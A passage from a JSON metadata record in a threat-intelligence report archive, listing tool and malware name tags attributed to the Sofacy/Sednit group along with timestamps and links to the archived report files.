				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434702,
	"ts_updated_at": 1775826762,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b6ae0db93e7425fe38ec31e89a9508fb68d1a06d.pdf",
		"text": "https://archive.orkl.eu/b6ae0db93e7425fe38ec31e89a9508fb68d1a06d.txt",
		"img": "https://archive.orkl.eu/b6ae0db93e7425fe38ec31e89a9508fb68d1a06d.jpg"
	}
}